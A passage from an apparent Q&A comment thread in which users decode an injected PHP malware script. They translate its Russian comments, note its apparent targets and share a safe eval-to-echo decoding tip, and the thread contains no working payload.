    }
    

    It's interesting to see some code comments in Russian. Google Translate does well for them: $res .= @fread($fp, 1024); /* читаем контент */ "read content"

    /* Проверка наличия загловков в контенте */ "Check availability of titles in the content"

    /* заголовки уже считаны - корректируем контент */ "headers already read - adjust content"

    Right, that's the encoding mechanism. But what's the payload?

    Updated my answer.

    Nice, Russian malware. Thank you for deciphering this nasty script:) This seems to be similar/same code as here: Need help to understand injected code.

    No prob, just finished an edit that includes a note about the Russian in the code.

    Found this online PHP & HHVM shell site which seems to decode the output automatically and it's doing some code analysis also.

    Funny, doing a GeoIP lookup, this seems to target USAISC headquarters as well as Level 3 servers. Running something on your server that targets US Army is probably not such a great plan.

    Nice work! Just a hint to make decoding faster/easier: you can simply replace the `eval` by an `echo`, and execute the script manually `php that_file.php > decoded.php`.

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM